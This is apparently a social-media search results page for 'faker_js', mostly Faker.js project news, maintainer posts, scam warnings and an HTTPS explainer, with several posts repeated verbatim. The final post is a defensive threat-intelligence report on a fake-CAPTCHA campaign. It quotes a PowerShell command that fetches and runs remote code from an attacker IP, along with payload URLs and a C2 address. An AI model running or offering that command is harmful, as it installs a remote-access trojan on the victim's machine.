Search
1000 results for “faker_js”
-
We published v8.0 last week
It is now marked as stable and we only did a v8.0.1 cleanup just right now that provides "correct" JSDocs to the official https://fakerjs.dev/ docs
So there are no runtime changes between 8.0.0 to 8.0.1, just the tooltips when you hover in VSCode -
We published https://github.com/faker-js/faker/releases/tag/v8.0.0-beta.0
1. Please read the top of the release notes
2. Please explore https://next.fakerjs.dev/
3. Please test the beta using the upgrading guideline https://next.fakerjs.dev/guide/upgrading.html and report any feedback here or per GitHub Issue related to the upgrading guide -
@nzakas Experimental branch in #Fakerjs: https://github.com/faker-js/faker/pull/3044
-
At Faker we now introduced a **awesome-faker** repository 🐼
If you know any resources, repositories, tutorials or whatever,
feel free to open a PR or issue 🙌 -
One of my co-maintainer at #Fakerjs wrote a wonderful comment about how to do open source contribution
https://github.com/faker-js/faker/discussions/2746#discussioncomment-8779358
@patak this might even interest you 🤔
-
Falso v2 is out - A modern, tree-shakable replacement for Faker.js
https://github.com/ngneat/falso
Discussions: https://discu.eu/q/https://github.com/ngneat/falso
-
@katherined I love this!
I'd like to tag @jessicasachs, @Shini92, and the rest of the new faker.js team on #GratitudeTuesday and thank them for their work over the last year after the previous maintainer rage-quit the project. It's an important tool for testing, and testing is important for security and reliability. 🙏🏻🙏🏻🙏🏻
-
@katherined I love this!
I'd like to tag @jessicasachs, @Shini92, and the rest of the new faker.js team on #GratitudeTuesday and thank them for their work over the last year after the previous maintainer rage-quit the project. It's an important tool for testing, and testing is important for security and reliability. 🙏🏻🙏🏻🙏🏻
-
@katherined I love this!
I'd like to tag @jessicasachs, @Shini92, and the rest of the new faker.js team on #GratitudeTuesday and thank them for their work over the last year after the previous maintainer rage-quit the project. It's an important tool for testing, and testing is important for security and reliability. 🙏🏻🙏🏻🙏🏻
-
@katherined I love this!
I'd like to tag @jessicasachs, @Shini92, and the rest of the new faker.js team on #GratitudeTuesday and thank them for their work over the last year after the previous maintainer rage-quit the project. It's an important tool for testing, and testing is important for security and reliability. 🙏🏻🙏🏻🙏🏻
-
@katherined I love this!
I'd like to tag @jessicasachs, @Shini92, and the rest of the new faker.js team on #GratitudeTuesday and thank them for their work over the last year after the previous maintainer rage-quit the project. It's an important tool for testing, and testing is important for security and reliability. 🙏🏻🙏🏻🙏🏻
-
Open source developer marak sabotaged his software projects in protest that large companies are using his work without paying him anything.
#sabotage #sabot #opensource #npm #github #funding
https://www.youtube.com/watch?v=R6S-b_k-ZKY
https://www.bleepingcomputer.com/news/security/dev-corrupts-npm-libs-colors-and-faker-breaking-thousands-of-apps/
https://web.archive.org/web/20210704022108/https://github.com/Marak/faker.js/issues/1046
https://github.com/marak/Faker.js/ -
🌟 Component-driven development with Faker: @jess had an amazing interview. Watch it here https://www.twitch.tv/videos/1883125872 or later on YouTube.
-
📢 WCP 2023-07-20 🗓️ (Weekly Community Post)
We just had an awesome Faker team meeting with some exciting discussions and decisions! Here's a quick rundown of what we covered:
👥 Participants: @Shini92 xDivisionByZerox import-brain ST-DDT
-
The both code-maintainer @ST-DDT and @Shini92 (that's me :ablobcatangel:) will now go into a ~2 month vacation/hibernation mode to rest a bit from working for #FakerJS
So in this time it is not expected that any features will be merged!
If there are high critical bugs or something really important that needs to be done/fixed, @Shini92 is still ping-able and alive.Wish you all happy coding with #Faker and thanks for being a great community :blobcatheart:
-
New malware JSCoreRunner is spreading via fake PDF converters
#JSCoreRunner
https://moonlock.com/jscorerunner-fake-pdf-converters -
Real Fake/Fake Real: Pro-Wrestling’s Kayfabe Conundrum #jstor https://daily.jstor.org/real-fake-fake-real-pro-wrestlings-kayfabe-conundrum
-
JSON Server - Get a full fake REST API with zero coding in less than 30 seconds. https://github.com/typicode/json-server #Dev #APIRest #JSON
-
Reupload from GamingOnLinux — beware fake Steam Deck deals! JSAUX fell for a scam; watch this quick video to learn how to spot fraudulent sites and protect your wallet. Quick, practical tips to keep you safe online — share to warn others! #SteamDeck #ScamAlert #JSAUX #GamingOnLinux #PeerTube #Gaming #Security #English
https://stl1988.peertube-host.de/videos/watch/728510ad-7df6-4193-90f1-fb9bddbc002e -
Reupload from GamingOnLinux — beware fake Steam Deck deals! JSAUX fell for a scam; watch this quick video to learn how to spot fraudulent sites and protect your wallet. Quick, practical tips to keep you safe online — share to warn others! #SteamDeck #ScamAlert #JSAUX #GamingOnLinux #PeerTube #Gaming #Security #English
https://stl1988.peertube-host.de/videos/watch/728510ad-7df6-4193-90f1-fb9bddbc002e -
Reupload from GamingOnLinux — beware fake Steam Deck deals! JSAUX fell for a scam; watch this quick video to learn how to spot fraudulent sites and protect your wallet. Quick, practical tips to keep you safe online — share to warn others! #SteamDeck #ScamAlert #JSAUX #GamingOnLinux #PeerTube #Gaming #Security #English
https://stl1988.peertube-host.de/videos/watch/728510ad-7df6-4193-90f1-fb9bddbc002e -
Reupload from GamingOnLinux — beware fake Steam Deck deals! JSAUX fell for a scam; watch this quick video to learn how to spot fraudulent sites and protect your wallet. Quick, practical tips to keep you safe online — share to warn others! #SteamDeck #ScamAlert #JSAUX #GamingOnLinux #PeerTube #Gaming #Security #English
https://stl1988.peertube-host.de/videos/watch/728510ad-7df6-4193-90f1-fb9bddbc002e -
Reupload from GamingOnLinux — beware fake Steam Deck deals! JSAUX fell for a scam; watch this quick video to learn how to spot fraudulent sites and protect your wallet. Quick, practical tips to keep you safe online — share to warn others! #SteamDeck #ScamAlert #JSAUX #GamingOnLinux #PeerTube #Gaming #Security #English
https://stl1988.peertube-host.de/videos/watch/728510ad-7df6-4193-90f1-fb9bddbc002e -
Milestone #accomplished
All #novation #circuit parameters now have a working knob/switch/fader widget in my #openStageControl #ui.
I have a #json object containing all the parameters and their #midi sysexdump position, cc address or nrpn msb lsb, min, max, range, default and a field for additional notes as a string for comments.
Now I need to add a field to each control containing the matching widget ID and then I can translate between sysex dump and osc state for preset management. Let's go. -
Watch out as North Korean group #UNC1069 targets Node.js maintainers using fake LinkedIn and Slack profiles to spread malware and compromise open source packages.
Read: https://hackread.com/unc1069-node-js-maintainer-fake-linkedin-slack-profile/
-
Oh, no! Then how will Amazon fool people into buying all those crappy products? Like the drum brushes I was shopping for?
You know when, instead of usual drum/cymbal sounds "ba-dum ching!" you want the "tss tss tss" sound? For that, drummers use those metal fibre brushes instead of drumsticks.
Several #Amazon reviews said: "Great brushes! I got my drums really clean!" The fake reviewer thought the brushes were for CLEANING instead of being a musical instrument.
-
@jscalzi : please stop using a http links if websites support https.
By specifying https://vote.org (or https://vote.org/ which gives the same result) in a link, or by typing https://vote.org in the address bar of your browser, there are three possibilities:
1) the browser connects to the _real_ vote.org website;
2) the browser displays a certificate error (never continue in such a case);
3) extemely unlikely (see [1]): the browser connects to a fake website that managed to obtain a valid certificate for the vote.org domain name.
(Note: I used the Unicode '/' character instead of the regular slash char '/' to prevent Mastodon from hiding the protocol).
By default, _none_ of the popular web browsers prevents active (i.e. not passive) criminals from successfully conducting Man-in-the-Middle attacks - if the first connection-attempt uses http.
Most browsers _may_ TRY https first, but an attacker can block that request, forcing the browser to downgrade to http (if the user explicitly requested https, such a downgrade to http will _not_ happen).
Such attacks can be conducted in various ways, such as by using an "evil twin" WiFi access point (https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/) or by manipulating DNS replies to browsers.
Note: the domain "vote.org" is currently _not_ listed in the HSTS preload list (apparently it was removed because of stupidities): https://hstspreload.org/?domain=vote.org (being listed would _force_ browsers to use https, even if "the user" requested http by tapping on such a link).
See also the unnecessarily poor results in https://internet.nl/site/vote.org/2883671/
Unfortunately also @BleepingComputer regularly uses unnecessary http links in their articles.
[1] More info: https://infosec.exchange/@Bitwiper/112779974228111155
#http #https #httpsvshttp#httpvshttps #AitM #MitM #EvilTwin #DNS #DNSAttacks #DV #DomainValidated #DomainValidation #Certificates #TLSCertificates #httpsCertificates #httpsServerCertificates #ServerCertificates #Authentication #Impersonation
-
@jscalzi : please stop using a http links if websites support https.
By specifying https://vote.org (or https://vote.org/ which gives the same result) in a link, or by typing https://vote.org in the address bar of your browser, there are three possibilities:
1) the browser connects to the _real_ vote.org website;
2) the browser displays a certificate error (never continue in such a case);
3) extemely unlikely (see [1]): the browser connects to a fake website that managed to obtain a valid certificate for the vote.org domain name.
(Note: I used the Unicode '/' character instead of the regular slash char '/' to prevent Mastodon from hiding the protocol).
By default, _none_ of the popular web browsers prevents active (i.e. not passive) criminals from successfully conducting Man-in-the-Middle attacks - if the first connection-attempt uses http.
Most browsers _may_ TRY https first, but an attacker can block that request, forcing the browser to downgrade to http (if the user explicitly requested https, such a downgrade to http will _not_ happen).
Such attacks can be conducted in various ways, such as by using an "evil twin" WiFi access point (https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/) or by manipulating DNS replies to browsers.
Note: the domain "vote.org" is currently _not_ listed in the HSTS preload list (apparently it was removed because of stupidities): https://hstspreload.org/?domain=vote.org (being listed would _force_ browsers to use https, even if "the user" requested http by tapping on such a link).
See also the unnecessarily poor results in https://internet.nl/site/vote.org/2883671/
Unfortunately also @BleepingComputer regularly uses unnecessary http links in their articles.
[1] More info: https://infosec.exchange/@Bitwiper/112779974228111155
#http #https #httpsvshttp#httpvshttps #AitM #MitM #EvilTwin #DNS #DNSAttacks #DV #DomainValidated #DomainValidation #Certificates #TLSCertificates #httpsCertificates #httpsServerCertificates #ServerCertificates #Authentication #Impersonation
-
@jscalzi : please stop using a http links if websites support https.
By specifying https://vote.org (or https://vote.org/ which gives the same result) in a link, or by typing https://vote.org in the address bar of your browser, there are three possibilities:
1) the browser connects to the _real_ vote.org website;
2) the browser displays a certificate error (never continue in such a case);
3) extemely unlikely (see [1]): the browser connects to a fake website that managed to obtain a valid certificate for the vote.org domain name.
(Note: I used the Unicode '/' character instead of the regular slash char '/' to prevent Mastodon from hiding the protocol).
By default, _none_ of the popular web browsers prevents active (i.e. not passive) criminals from successfully conducting Man-in-the-Middle attacks - if the first connection-attempt uses http.
Most browsers _may_ TRY https first, but an attacker can block that request, forcing the browser to downgrade to http (if the user explicitly requested https, such a downgrade to http will _not_ happen).
Such attacks can be conducted in various ways, such as by using an "evil twin" WiFi access point (https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/) or by manipulating DNS replies to browsers.
Note: the domain "vote.org" is currently _not_ listed in the HSTS preload list (apparently it was removed because of stupidities): https://hstspreload.org/?domain=vote.org (being listed would _force_ browsers to use https, even if "the user" requested http by tapping on such a link).
See also the unnecessarily poor results in https://internet.nl/site/vote.org/2883671/
Unfortunately also @BleepingComputer regularly uses unnecessary http links in their articles.
[1] More info: https://infosec.exchange/@Bitwiper/112779974228111155
#http #https #httpsvshttp#httpvshttps #AitM #MitM #EvilTwin #DNS #DNSAttacks #DV #DomainValidated #DomainValidation #Certificates #TLSCertificates #httpsCertificates #httpsServerCertificates #ServerCertificates #Authentication #Impersonation
-
2026-04-27 (Monday):
Example of #SmartApeSG URLs for fake CAPTCHA/human verification page:
- hxxps[:]//datanexlab[.]top/trace/audit-module.js
- hxxps[:]//datanexlab[.]top/trace/refresh-css.php?hZ5akaYM
- hxxps[:]//datanexlab[.]top/trace/alias-thread.js?78a6eb157b4ca38e45#ClickFix script injected into clipboard:
powershell -c iex(irm 216.120.201[.]116 -UseBasicParsing)
Traffic leading to #RAT payload:
- hxxp[:]//216.120.201[.]116/
- hxxp[:]//104.225.129[.]105/
- hxxps[:]//truebasecore[.]com/ioZip archive with package for RAT payload:
- SHA256 hash: 5a30867937f1e2f714c8b398436135c63c164267602cc66a5adb5b4c2ed55365
#RAT payload C2 traffic:
- tcp[:]//89.110.110[.]119:443/